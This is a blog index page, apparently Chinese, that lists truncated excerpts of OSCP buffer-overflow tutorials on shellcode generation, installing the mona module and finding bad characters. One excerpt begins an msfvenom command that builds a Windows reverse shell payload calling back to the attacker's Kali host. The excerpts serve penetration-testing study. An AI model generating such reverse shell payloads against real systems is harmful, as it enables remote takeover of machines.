摘要:
OSCP Security Technology - Generating Shellcode& Gaining Root Generating shellcode.(Note: LHOST is Kali Linux's IP) msfvenom -p windows/shell_reverse_ 阅读全文
摘要:
OSCP Security Technology - Finding the Right Module Download Mona module and set immunity debugger configuration. https://github.com/corelan/mona Open 阅读全文
摘要:
OSCP Security Technology - Finding Bad Characters Finding bad characters with immunity debugger. nano badchars.py chmod 777 badchars.py #!/usr/bin/pyt 阅读全文